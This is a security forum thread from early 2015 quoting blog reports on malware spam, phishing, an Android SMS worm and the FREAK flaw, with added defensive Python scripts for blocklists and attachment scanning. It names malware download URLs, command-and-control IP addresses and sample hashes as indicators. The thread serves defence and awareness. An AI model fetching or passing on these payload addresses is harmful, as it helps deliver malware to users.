For the end-user, the search experience is simply terrible but yet not the end of their troubles. In this case, clicking on any link results in a -redirection- to an exploit kit landing page, quickly followed by malware... As usual, after several convoluted redirects, the user ends up on the door step of the famous Angler exploit kit... Vulnerable computers are infected with a piece of malware detected as Trojan.Crypt.NKN by Malwarebytes Anti-Malware. It will install a rogue Antivirus program known as 'Malware Defender 2015' and pull up a purchase page from an IP address located in Istanbul (176.53.125.20)**... The lesson to learn from this is to once again stay away from bundled software and other programs that appear to be free but come with a catch. Also, if you’re starting to see a different home page or search engine than you used to, you should make sure your browser has not been altered in some way."
* 136.243.24.248: https://www.virustotal.com/en/ip-address/136.243.24.248/information/
** 176.53.125.20: https://www.virustotal.com/en/ip-address/176.53.125.20/information/
___
Fake 'Invoice' SPAM - doc malware
- http://blog.dynamoo.com/2015/02/malware-spam-dennys-invoice-inv650988.html
27 Feb 2015 - "This -fake- invoice email is not from Dennys but is a simple forgery with a malicious attachment. Dennys are not sending the spam, and their systems have not been compromised in any way.
From: accounts@ dennys .co.uk
Date: 27 February 2015 at 09:14
Subject: Dennys Invoice INV650988
To view the attached document, you will need the Microsoft Word installed on your system.
So far I have only seen a single sample, with an attachment INV650988.doc which has a VirusTotal detection rate of exactly zero*. This contains this malicious macro... which downloads another component from the following location:
http ://hew.homepage.t-online. de/js/bin.exe
This is saved as %TEMP%\324235235.exe and has a VirusTotal detection rate of 1/57**.
According to the Malwr report, this executable then goes on and downloads another version of itself and a config file from:
http ://apartmentprofile .su/conlib.php
http ://paczuje.cba .pl/java/bin.exe
It drops several files, KB2896~1.EXE [VT 3/57***], edg2.exe [VT 3/57****] and a Dridex DLL which is much more widely detected (and we saw this same DLL yesterday)... Between the Malwr and VirusTotal analyses, we see attempts to communicate with the following IPs:
198.52.200.15 (Centarra Networks, US)
95.211.144.65 (Leaseweb, Netherlands)
195.114.0.64 (SuperHost.pl, Poland)
92.63.87.13 (MWTV, Latvia)
78.140.164.160 (Webazilla, US)
59.97.137.171 (Broadband Multiplay Project, India)
104.232.32.119 (Net 3, US)
Some of these are shared hosting, I recommend for maximum protection that you apply the following blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
198.52.200.15
78.140.164.160
59.97.137.171
104.232.32.119 "
* https://www.virustotal.com/en/file/42efc98ed3f157b3a607a768e49f00f28a5f3eaeac167b9f7007a5510e3d8aec/analysis/1425029078/
** https://www.virustotal.com/en/file/06cceb310e667e143dbb938f41123a90eb82719e273e9e9c436f8bdebebdaa85/analysis/1425029464/
*** https://www.virustotal.com/en/file/d5269645293e4b5d6eba8aa74bad10776dfc960d16b3768398b02ee342e35b09/analysis/1425031075/
**** https://www.virustotal.com/en/file/affde7d8451393edd88a2cd926379993dd5fc853c6c0395fa7d20495836d828a/analysis/1425031099/
- http://myonlinesecurity.co.uk/dennys-invoice-inv650988-word-doc-or-excel-xls-spreadsheet-malware/
27 Feb 2015
> https://www.virustotal.com/en/file/42efc98ed3f157b3a607a768e49f00f28a5f3eaeac167b9f7007a5510e3d8aec/analysis/1425027918/
___
Fake 'Offer Sheet' SPAM – PDF malware
- http://myonlinesecurity.co.uk/pearl-summer-offer-sheet-fake-pdf-malware/
27 Feb 2015 - "'Pearl Summer Offer Sheet' pretending to come from maikel.theunissen@ pearleurope .com with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Pearl-Summer-Offer-Sheet.png
27 February 2015: Pearl UK Summer Offer Sheet 2015.zip: Extracts to: Pearl UK Summer Offer Sheet 2015.exe
Current Virus total detections: 0/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/7f8dd1fd3e0d4cae2ddca058eb71015a608bed1486977ac178c5c3b2cf8c3668/analysis/1425039221/
... Behavioural information
TCP connections
216.146.43.70: https://www.virustotal.com/en/ip-address/216.146.43.70/information/
181.189.152.131: https://www.virustotal.com/en/ip-address/181.189.152.131/information/
192.185.86.160: https://www.virustotal.com/en/ip-address/192.185.86.160/information/
181.189.152.131: https://www.virustotal.com/en/ip-address/181.189.152.131/information/
UDP communications
107.23.150.92: https://www.virustotal.com/en/ip-address/107.23.150.92/information/
107.23.150.99: https://www.virustotal.com/en/ip-address/107.23.150.99/information/
___
Fake 'eFax message' SPAM – PDF malware
- http://myonlinesecurity.co.uk/efax-message-from-unknown-1-pages-caller-id-1-219-972-8538-fake-pdf-malware/
27 Feb 2015 - "'eFax message from “unknown” – 1 page(s), Caller-ID: 1-219-972-8538' pretending to come from message@ inbound .efax .com with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/eFax-message-from-unknown-1024x610.png
27 February 2015: FAX_20150226_1424989043_176.zip: Extracts to: FAX_20150226_1424989043_176.exe
Current Virus total detections: 4/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/de32206ccde1b20a944c5ac4c49a565d9d65ba4786bacc37aa18c2ca7d83b39f/analysis/1425056870/
... Behavioural information
TCP connections
91.198.22.70: https://www.virustotal.com/en/ip-address/91.198.22.70/information/
181.189.152.131: https://www.virustotal.com/en/ip-address/181.189.152.131/information/
192.185.106.103: https://www.virustotal.com/en/ip-address/192.185.106.103/information/
UDP communications
217.10.68.152: https://www.virustotal.com/en/ip-address/217.10.68.152/information/
:fear::fear: :mad:
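The Chris Christou and Dennys items above each end with a recommended blocklist, and the Dennys one deliberately leaves out two shared-hosting addresses. The script below is an added example (not dynamoo's code) that takes the C2 addresses and blocklist entries as quoted in those two posts, reports which observed addresses the list would not cover, merges the two lists, and runs the merged list over iptables-style log lines. The log lines and the 10.0.0.x internal hosts are constructed.

```python
import ipaddress
import re

# Hosts the Chris Christou and Dennys posts above saw the dropper contacting,
# and the union of the blocklists dynamoo recommended in those two posts.
OBSERVED_C2 = [
    "92.63.87.13", "78.140.164.160", "86.104.134.156", "104.232.32.119",
    "198.52.200.15", "95.211.144.65", "195.114.0.64", "59.97.137.171",
]
RECOMMENDED_BLOCKLIST = [
    "92.63.82.0/23", "92.63.84.0/22", "92.63.88.0/24",
    "78.140.164.160", "86.104.134.156", "104.232.32.119",
    "198.52.200.15", "59.97.137.171",
]


def parse_blocklist(entries):
    """Turn a mixed list of single IPs and CIDR prefixes into network objects."""
    return [ipaddress.ip_network(e, strict=False) for e in entries]


def coverage(observed, blocklist):
    """Map each observed IP to the blocklist entry that covers it (None if none)."""
    nets = parse_blocklist(blocklist)
    result = {}
    for ip in observed:
        addr = ipaddress.ip_address(ip)
        result[ip] = next((str(n) for n in nets if addr in n), None)
    return result


def uncovered(observed, blocklist):
    """Observed IPs the blocklist would not stop, in address order."""
    return sorted(
        (ip for ip, net in coverage(observed, blocklist).items() if net is None),
        key=ipaddress.ip_address,
    )


def merge_blocklists(*lists):
    """Union several posts' blocklists, dropping duplicates and merging
    prefixes that together form a larger CIDR block."""
    nets = [n for lst in lists for n in parse_blocklist(lst)]
    return [str(n) for n in ipaddress.collapse_addresses(nets)]


# Minimal parser for iptables-style kernel log lines (SRC=... DST=...).
_LOG_RE = re.compile(r"SRC=(?P<src>[\d.]+) DST=(?P<dst>[\d.]+)")


def match_firewall_log(lines, blocklist):
    """Return (src, dst, matching_entry) for each log line whose destination
    falls inside the blocklist; use it to find hosts that are already infected."""
    nets = parse_blocklist(blocklist)
    hits = []
    for line in lines:
        m = _LOG_RE.search(line)
        if not m:
            continue
        dst = ipaddress.ip_address(m.group("dst"))
        for net in nets:
            if dst in net:
                hits.append((m.group("src"), m.group("dst"), str(net)))
                break
    return hits


# Constructed sample log lines; 10.0.0.x are hypothetical internal hosts and
# 198.51.100.7 is a documentation address standing in for normal traffic.
SAMPLE_LOG = [
    "Feb 27 09:20:11 fw kernel: IN=eth1 OUT=eth0 SRC=10.0.0.23 DST=92.63.87.13 PROTO=TCP DPT=8080",
    "Feb 27 09:20:12 fw kernel: IN=eth1 OUT=eth0 SRC=10.0.0.23 DST=198.51.100.7 PROTO=TCP DPT=443",
    "Feb 27 09:21:05 fw kernel: IN=eth1 OUT=eth0 SRC=10.0.0.41 DST=104.232.32.119 PROTO=TCP DPT=443",
]

if __name__ == "__main__":
    print("not covered:", uncovered(OBSERVED_C2, RECOMMENDED_BLOCKLIST))
    print("merged:", merge_blocklists(RECOMMENDED_BLOCKLIST, RECOMMENDED_BLOCKLIST))
    print("hits:", match_firewall_log(SAMPLE_LOG, RECOMMENDED_BLOCKLIST))
```

The two addresses uncovered() reports are exactly the Leaseweb and SuperHost.pl ones the Dennys post describes as shared hosting, which is the trade-off a blocklist like this makes: blocking them would also block whatever else lives on those boxes.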
AplusWebMaster
2015-03-01, 19:03
FYI...
Fake 'Order/ Payment' SPAM – Java malware
- http://myonlinesecurity.co.uk/lucy-c-ulngaro-new-order-payment-java-malware/
1 Mar 2015 - "'lucy C Ulngaro New Order/ Payment' pretending to come from Admin <tareq@ msp .com.sa> with a jar attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/New-Order-Payment.png
1 March 2015: PO-2015-0123.jar: Current Virus total detections: 22/57*
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a zip file instead of the java file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/4aa073892196a1b29af98f3006379bcfc13b82d46bf1cb4477eed7173283f0ad/analysis/1425193109/
___
Fake job offer SPAM
- http://blog.dynamoo.com/2015/02/fake-job-offer-tradeconstructioncouk.html
28 Feb 2015 - "This -fake- job offer claimed to be from a UK-based company called Trade Construction Company LLC using a website at tradeconstruction .co .uk. However, no such company exists in the UK, and this is a rip-off of a wholly legitimate US firm that is actually called Trade Construction Company LLC who are -not- involved in this scam at all.
From: JOB ALERT [klakogroups@ gmail .com]
Reply-To: klakogroups@ gmail .com
To: Recipients [klakogroups@ gmail .com]
Date: 27 February 2015 at 18:37
Subject: NEW JOB VACANCIES IN LONDON.
Trade Construction Company,
L.L.C,
70 Gracechurch Street.
EC3V 0XL, London. UK
We require the services of devoted and hardworking workers, who are ready to work after undergoing enlistment training. in all sectors
as The Trade Construction Company Management intends to increase its man power base due to increasing number of customers and contract in the Company.
Available Positions...
... The tradeconstruction .co.uk site is almost a bit-by-bit copy of the genuine tradeconstruction .com website.
> https://4.bp.blogspot.com/-SqBEq8BOcCk/VPGUfPry6_I/AAAAAAAAGSg/hRxzkJeNGpU/s1600/tradeconstruction1.jpg
... Nothing about this job offer is legitimate. It does -not- come from who it appears to come from and should be considered to be a -scam- and avoided."
:fear: :mad:
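Nearly every sample in these posts relies on the same two tricks: a real '.exe', '.scr' or '.jar' extension hidden behind a document or media icon, and, in the RingCentral 'wav' sample, a Cyrillic б in place of a 6 that crashed the auto analysers. The scanner below is an added example, not code from myonlinesecurity.co.uk or dynamoo.com, that flags both on an in-memory zip attachment. The sample archive is constructed: the member names follow the posts, but the contents are stand-in bytes, not the malware.

```python
import io
import unicodedata
import zipfile

# Extensions Windows runs directly on double-click.
EXECUTABLE_EXTS = {
    "exe", "scr", "com", "pif", "bat", "cmd", "js", "jse", "vbs", "vbe",
    "wsf", "hta", "jar", "msi", "cpl",
}
# Document/media extensions the lures in these posts imitate.
DECOY_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "wav", "mp3", "txt", "zip"}


def findings_for_member(name, head):
    """Reasons a zip member looks like a disguised executable.

    name: file name as stored in the archive
    head: first bytes of the member's content
    """
    reasons = []
    base = name.rsplit("/", 1)[-1]
    exts = base.lower().split(".")[1:]
    final = exts[-1] if exts else ""
    if final in EXECUTABLE_EXTS:
        reasons.append(f"executable extension .{final}")
    # "invoice.pdf.exe": with "hide extensions for known file types" on,
    # Explorer shows only "invoice.pdf".
    if len(exts) >= 2 and exts[-2] in DECOY_EXTS and final in EXECUTABLE_EXTS:
        reasons.append(f"double extension .{exts[-2]}.{final}")
    # A PE file starts with "MZ"; one stored under a document extension is a
    # spoof regardless of what the icon says.
    if head[:2] == b"MZ" and final not in EXECUTABLE_EXTS:
        reasons.append(f"PE header under non-executable extension .{final}")
    # Non-ASCII is legitimate in general, but a lookalike inside an otherwise
    # ASCII name (Cyrillic б for the digit 6) is how the RingCentral sample
    # broke the sandboxes.
    for ch in base:
        if ord(ch) > 127:
            reasons.append(f"non-ASCII character {ch!r} ({unicodedata.name(ch, 'unknown')})")
            break
    return reasons


def scan_zip(data):
    """Scan an in-memory zip attachment; returns {member name: [reasons]}."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(4)
            report[info.filename] = findings_for_member(info.filename, head)
    return report


# Constructed sample archive. Names follow the posts above; contents are a PE
# header stub or a PDF header, not malware.
HOMOGLYPH_NAME = "NoCallerID-1218-162550-153\u0431.wav.exe"  # \u0431 is Cyrillic б
PE_STUB = b"MZ\x90\x00" + b"\x00" * 60
PDF_STUB = b"%PDF-1.4\n%\xe2\xe3\xcf\xd3\n"


def build_sample_zip():
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(HOMOGLYPH_NAME, PE_STUB)
        zf.writestr("fax_2342.exe", PE_STUB)
        zf.writestr("invoice.pdf", PE_STUB)  # constructed: PE bytes behind a .pdf name
        zf.writestr("RA_New.pdf", PDF_STUB)  # genuine-looking PDF, should be clean
        zf.writestr("PO-2015-0123.jar", b"PK\x03\x04")  # a jar is a zip, but it runs
    return buf.getvalue()


if __name__ == "__main__":
    for member, reasons in scan_zip(build_sample_zip()).items():
        print(member, "->", reasons or "clean")
```

Wire scan_zip() into a mail gateway hook and quarantine on any finding; the name checks cost nothing, and the "MZ" check catches the icon spoof even when the sender gets the extension past a simple blocklist.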
AplusWebMaster
2015-03-02, 21:52
FYI...
Fake 'Secure Message' SPAM – PDF malware
- http://myonlinesecurity.co.uk/jp-morgan-access-secure-message-fake-pdf-malware/
2 Mar 2015 - "'JP Morgan Access Secure Message' pretending to come from JP Morgan Access <service@ jpmorgan .com> with a zip attachment is another one from the current bot runs... The email looks like:
Please check attached file(s) for your latest account documents regarding your online account.
Forrest Blackwell
Level III Account Management Officer
817-140-6313 office
817-663-8851 cell
Forrest .Blackwell@ jpmorgan .com
Investments in securities and insurance products are:
NOT FDIC-INSURED/NO BANK-GUARANTEES/MAY LOSE VALUE
2015 JPMorgan Chase & Co...
2 March 2015: JP Morgan Access – Secure.zip : Extracts to: JP Morgan Access – Secure.scr
Current Virus total detections: 9/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/2e6326d840a7656321ea9a946efb2a57f15ab6cf3b07a668e8a14bb56229150e/analysis/1425314842/
:fear: :mad:
AplusWebMaster
2015-03-03, 15:32
FYI...
Fake 'Apple ID' – phish...
- http://myonlinesecurity.co.uk/your-recent-download-with-your-apple-id-phishing/
2 Mar 2015 - "'Your recent download with your Apple ID' pretending to come from Apple iTunes <orders@ tunes .co.uk> is one of the latest -phish- attempts to steal your Apple Account and your Bank, credit card and personal details. This one only wants your personal details, Apple log in details and your credit card and bank details... This one has a short url link in the email which -redirects- you...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/Your-recent-download-with-your-Apple-ID.png
If you follow-the-link (don't) you see a webpage looking like:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/verify_apple_ID.png
... fill in your user name and password you get a page looking very similar to this one (split into sections), where the phishers try to validate your details to make sure that you are entering “genuine” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format.
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/verify_apple_ID_2.png
...
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/verify_apple_ID_3.png
All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."
___
Fraud Alert: Unauthorised Appstore Payment – phish
- http://myonlinesecurity.co.uk/fraud-alert-unauthorised-appstore-payment-phishing/
3 Mar 2015 - "'Fraud Alert: Unauthorised Appstore Payment' pretending to come from iTunes <datacareapsecurity@ apple. co.uk> is one of the latest -phish- attempts to steal your Apple Account and your Bank, credit card and personal details...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/Fraud-Alert-Unauthorised-Appstore-Payment.png
All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."
___
Worm.Gazon: Want Gift Card? Get Malware
- http://www.adaptivemobile.com/blog/worm-gazon-want-gift-card-get-malware
2 Mar 2015 - "... A simple piece of -malware- is on the way to becoming one of the 'spammiest' mobile malware outbreaks seen yet. This malware we have dubbed Gazon spreads via SMS with a shortened link to itself in the spam message, redirecting a potential victim to a webpage that promises an Amazon gift card if you install an APK file hosted on the page:
Hey [NAME], I am sending you $200 Amazon Gift Card You can Claim it here : https ://bit .ly/ getAmazon[redactedD]
> http://www.adaptivemobile.com/images/blog-uploads/gazon-download.jpg
The malware passes itself off as an app that gives Amazon rewards. However, the only thing it actually does is pull up a scam page inside the app which asks you to participate in the -survey- ... Each of the options below ends up taking you to either another scam page or asks you to download a game from Google Play. While you are busy clicking through pages the author just earns money through your clicks as we have seen in other pieces of mobile malware.
> http://www.adaptivemobile.com/images/blog-uploads/gazon-scam1.png
However, in the background this malware harvests all your contacts and sends a -spam- message to each of them with the URL pointing to the body of the worm... Thousands of people have seemingly installed this malware and been a victim. We are seeing over 4k infected devices in all of the major networks in North America, and we've blocked over 200k spam messages generated by these infected devices. Stopping the spread via messaging is critical as each one of these messages was an attempt to spread the app to an infected user's contacts. Based on click-throughs from the shortened URL it also seems this malware has been encountered in multiple other countries as well, worldwide. At the moment none of the AV engines detect this malware according to VirusTotal.
> http://www.adaptivemobile.com/images/blog-uploads/gazon-virustotal.png
... users should be aware of this -scam- and as always, be careful clicking on links in text messages that seem suspect. In this case, like other worm malware we have seen recently, even messages your contacts send you may not be safe. The malware can be removed using standard Android app uninstall utilities..."
:fear: :mad:
AplusWebMaster
2015-03-04, 14:03
FYI...
Fake no body text SPAM - malicious attachment
- http://blog.dynamoo.com/2015/03/malware-spam-john-donald.html
4 Mar 2015 - "This rather terse email comes with a malicious attachment:
From: John Donald [john@ kingfishermanagement .uk .com]
Date: 4 March 2015 at 09:09
Subject: Document1
There is no body text, but there is an attachment Document1.doc which is not currently detected by AV vendors*, in turn it contains this malicious macro... which downloads another component from the following location:
http ://retro-moto .cba .pl/js/bin.exe
Note that there may be other different versions of this document with different download locations, but it should be an identical binary that is downloaded. This file is saved as %TEMP%\GHjkdjfgjkGKJ.exe and has a VirusTotal detection rate of 2/57**. Automated analysis tools... show attempted network traffic to the following IPs:
92.63.87.13 (MWTV, Latvia)
104.232.32.119 (Net3, US)
87.236.215.103 (OneGbits, Lithuania)
108.61.198.33 (Gameservers.com / Choopa LLC, Netherlands)
According to the Malwr report it also drops another version of itself with a detection rate of just 1/57*** plus a DLL with a detection rate of 7/56****.
Recommended blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
104.232.32.119
87.236.215.103
108.61.198.33 "
* https://www.virustotal.com/en/file/20afc565c00d30b2d194366d088b73b20913af78857c906305fab79a5c726f83/analysis/1425464228/
** https://www.virustotal.com/en/file/193401848fc8e9e05dff43ff6796156f54ef32987f5beb20682f40f469be741e/analysis/1425464153/
*** https://www.virustotal.com/en/file/71d01f4fdf48bc674ea9dc84ac076a22094ab529f4776fb9c0c5a13cfb00a438/analysis/1425466045/
**** https://www.virustotal.com/en/file/02cda7a3217390dfe6f40c7336efd368131f6fb9620129744422459da1dea17a/analysis/1425466059/
- http://myonlinesecurity.co.uk/john-donald-kingfishermanagement-uk-com-document1-word-doc-or-excel-xls-spreadsheet-malware/
4 Mar 2015
> Document1.docx: https://www.virustotal.com/en/file/b8dc4c8dcc9d7be5e82079b2f28a63363afc9c3ebadd4034b98b4862e39db580/analysis/1425459634/
> https://www.virustotal.com/en/file/193401848fc8e9e05dff43ff6796156f54ef32987f5beb20682f40f469be741e/analysis/1425460757/
... Behavioural information
TCP connections
92.63.87.13: https://www.virustotal.com/en/ip-address/92.63.87.13/information/
___
Fake 'Remittance advice' SPAM – word doc or excel xls malware
- http://myonlinesecurity.co.uk/remittance-advice-rem_5556yj-xml-word-doc-or-excel-xls-spreadsheet-malware/
4 Mar 2015 - "'Remittance advice [Rem_5556YJ.xml] (random numbers)' pretending to come from random addresses and random companies with a malicious word doc or Excel XLS spreadsheet attachment (these are actually XML Word files) is another one from the current bot runs... This email has what appears to be a genuine word doc or Excel XLS spreadsheet attached which is malformed and contains a macro script virus. Modern versions of Microsoft office, that is Office 2010 and 2013 and Office 365 have Macros disabled by default, UNLESS you or your company have enabled them... The email looks like:
Good morning
You can find remittance advice [Rem_5556YJ.xml] in the attachment
Kind Regards
Lenny Madden
GLAXOSMITHKLINE
4 March 2015 : Rem_5892GV.xml Current Virus total detections: 0/56* | 0/56**
So far I have only seen 2 versions of this malware, but previous campaigns over the last few weeks have delivered 2 or 3 or even more different versions, some with word doc attachments and some with Excel xls attachments... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/d40d05316db62ea3d27830f87892aaeab3ff22b63babadb755aad10dcba85a7d/analysis/1425470968/
** https://www.virustotal.com/en/file/583c668dce73021aae44daab0788fc8ae5fecefab0989ab45ee60bba00465943/analysis/1425471785/
- http://blog.dynamoo.com/2015/03/remittance-advice-spam-has-mystery-xml.html
4 Mar 2015
"... recommend blocking them:
62.76.176.203
46.30.42.171
74.208.68.243
37.139.47.111 "
___
Fake 'UPS Tracking' SPAM – PDF malware
- http://myonlinesecurity.co.uk/ups-ship-notification-tracking-number-1z06e18a6840121864-fake-pdf-malware/
4 Mar 2015 - "'UPS Ship Notification, Tracking Number 1Z06E18A6840121864' pretending to come from UPS <no-replay@ upsi .com> with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/UPS-Ship-Notification-Tracking-Number-1Z06E18A6840121864.png
04 March 2015: Details.zip: Extracts to: Details.exe
Current Virus total detections: 12/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/3d68d1d5e8d2207dbf340d383938cbc4d61f69b2dd526889a5f7041c6c5b38a4/analysis/1425482799/
... Behavioural information
TCP connections
216.146.38.70: https://www.virustotal.com/en/ip-address/216.146.38.70/information/
190.111.9.129: https://www.virustotal.com/en/ip-address/190.111.9.129/information/
108.174.149.222: https://www.virustotal.com/en/ip-address/108.174.149.222/information/
190.111.9.129: https://www.virustotal.com/en/ip-address/190.111.9.129/information/
UDP communications
212.79.111.155: https://www.virustotal.com/en/ip-address/212.79.111.155/information/
212.79.111.156: https://www.virustotal.com/en/ip-address/212.79.111.156/information/
___
Fake 'invoice' SPAM - PDF malware
- http://myonlinesecurity.co.uk/ron-miller-rmpd7989-invoices-fake-pdf-malware/
4 Mar 2015 - "'RMPD#7989 – invoices' pretending to come from Rothn-Ron <ron@ bellsouth .net> with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/RMPD7989-invoices.png
04 March 2015: RMPD#7989 INVOICES.zip: Extracts to: RMPD#7989 INVOICES.exe
Current Virus total detections: 9/57*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/e73daa08ae82b4e5a9b7974a4dbfc3e46525258346d73963fed319cd79656ee5/analysis/1425486885/
... Behavioural information
TCP connections
216.146.38.70: https://www.virustotal.com/en/ip-address/216.146.38.70/information/
190.111.9.129: https://www.virustotal.com/en/ip-address/190.111.9.129/information/
108.174.149.222: https://www.virustotal.com/en/ip-address/108.174.149.222/information/
190.111.9.129: https://www.virustotal.com/en/ip-address/190.111.9.129/information/
UDP communications
217.10.68.152: https://www.virustotal.com/en/ip-address/217.10.68.152/information/
217.116.122.136: https://www.virustotal.com/en/ip-address/217.116.122.136/information/
___
Many common sites might be temporarily offline
- http://myonlinesecurity.co.uk/many-common-sites-might-be-temporarily-offline/
4 Mar 2015 - "... Amazon and Rackspace have both announced that they will need to -reboot- some of their servers to address the issue before March 10, when the Xen Project plans to disclose the latest bugs*. Details of the vulns are being withheld for now, to give the cloud vendors time to patch. In a FAQ** about the upcoming maintenance, Amazon Web Services said that only some of its earliest Elastic Compute Cloud (EC2) customers should be affected."
* http://xenbits.xen.org/xsa/
** https://aws.amazon.com/premiumsupport/maintenance-2015-03/
- http://blog.trendmicro.com/trendlabs-security-intelligence/freak-vulnerability-forces-weaker-encryption/
Mar 4, 2015 - "... We advise Android users to refrain from using the default Android browser in their devices. They can instead use the Google Chrome app as it is not affected by the bug. Furthermore, connections to the Google search site are not affected. According to Deep Security Labs Director Pawan Kinger, FREAK is a serious and very real vulnerability which may require some level of sophistication to exploit. However, its sophistication won’t dissuade determined attackers. Carrying out a FREAK exploit requires attackers to be able to first create a man-in-the-middle (MITM) attack against the servers. It would also require the ability to control an SSL session between client and server and then force that session to downgrade to the lower encryption level. Then, the attacker would have to take the weakly encrypted traffic and perform a brute force attack against it that would take several hours, as opposed to days or weeks with higher encryption... Administrators can also check if their site is vulnerable by using the SSL Labs’ SSL Server Test*..."
* https://www.ssllabs.com/ssltest/
- http://www.bloomberg.com/news/videos/2015-03-04/hackers-exploit-freak-attack-hole
Mar 4, 2015 - Video 2:40
:fear::fear: :mad:
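The posts above keep returning to two delivery tricks: an executable whose icon and name make it look like a PDF (so it only shows up if "show known file extensions" is enabled), and a Word or Excel document carrying a macro that downloads the real payload. The following is an added example, not code from this thread or from the blogs it quotes, of how a mail gateway or triage script can flag both before a user ever sees the icon. The ZIP and Office samples are constructed stand-ins shaped like the attachments reported here (an MZ header plus padding, not real malware), and the OLE macro check is a string heuristic of this example rather than a full OLE2 parser:

```python
import io
import re
import zipfile

# Extensions Windows runs directly when double-clicked. CHM is included
# because of the Cryptowall .chm attachments mentioned later in this thread.
EXEC_EXT = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "jse",
            "vbs", "vbe", "wsf", "hta", "chm"}
# Document-looking tokens; an executable extension behind one of these
# (MSG00311.WAV.exe, IM0743436407_pdf.exe) is the spoofed-icon trick.
DOC_EXT = {"pdf", "doc", "docx", "xls", "xlsx", "wav", "txt", "jpg",
           "png", "zip", "html", "htm"}
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
# Stream names legacy (OLE2) Office files use for VBA code, as they appear
# UTF-16LE-encoded in the OLE directory. Heuristic assumption of this
# example, not a full OLE parser.
OLE_MACRO_MARKERS = [
    "Macros".encode("utf-16-le"),
    "_VBA_PROJECT".encode("utf-16-le"),
]
MAX_MEMBER_BYTES = 8 * 1024 * 1024   # do not inflate huge archive members
MAX_DEPTH = 3                        # zip-in-zip nesting limit


def check_name(name):
    """Findings based on the file name alone."""
    findings = []
    parts = name.lower().rsplit("/", 1)[-1].split(".")
    if len(parts) < 2:
        return findings
    if parts[-1] in EXEC_EXT:
        findings.append(f"executable extension .{parts[-1]}: {name}")
        stem_tokens = re.split(r"[._\-]", ".".join(parts[:-1]))
        if any(tok in DOC_EXT for tok in stem_tokens):
            findings.append(f"double extension disguises executable as a document: {name}")
    return findings


def triage_attachment(name, data, _depth=0):
    """Return a list of human-readable findings for one attachment."""
    findings = check_name(name)
    if data[:2] == b"MZ":
        findings.append(f"PE executable content (MZ header): {name}")
    elif data[:4] == b"PK\x03\x04" and _depth < MAX_DEPTH:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = zf.namelist()
            if "[Content_Types].xml" in names:
                # OOXML (docx/xlsx/docm/xlsm): a macro project lives in vbaProject.bin
                if any(n.lower().endswith("vbaproject.bin") for n in names):
                    findings.append(f"OOXML document with VBA macro project: {name}")
            else:
                # plain archive: look at every member, recursively
                for member in names:
                    if zf.getinfo(member).file_size > MAX_MEMBER_BYTES:
                        findings.append(f"oversized member skipped: {member}")
                        continue
                    for sub in triage_attachment(member, zf.read(member), _depth + 1):
                        findings.append(f"inside {name}: {sub}")
    elif data[:8] == OLE_MAGIC:
        if any(marker in data for marker in OLE_MACRO_MARKERS):
            findings.append(f"legacy Office document with VBA macro streams: {name}")
    return findings


def _zip_with(members):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for member_name, content in members.items():
            zf.writestr(member_name, content)
    return buf.getvalue()


# Constructed stand-ins shaped like the attachments reported in this thread;
# none is a real sample, the "executables" are just an MZ header and padding.
SAMPLES = {
    "Details.zip": _zip_with({"Details.exe": b"MZ" + b"\x00" * 62}),
    "MSG00311.WAV.ZIP": _zip_with({"MSG00311.WAV.exe": b"MZ" + b"\x00" * 62}),
    "Incident IM00491288.zip": _zip_with({"IM0743436407_pdf.exe": b"MZ" + b"\x00" * 62}),
    "Brochure2.doc": OLE_MAGIC + b"\x00" * 504 + "Macros".encode("utf-16-le") + b"\x00" * 64,
    "Invoice.docm": _zip_with({"[Content_Types].xml": b"<Types/>",
                               "word/vbaProject.bin": OLE_MAGIC + b"\x00" * 56}),
    "statement.pdf": b"%PDF-1.4\n%%EOF\n",
}


def run_samples():
    """Map each sample name to its findings (empty list means nothing flagged)."""
    return {name: triage_attachment(name, data) for name, data in SAMPLES.items()}


if __name__ == "__main__":
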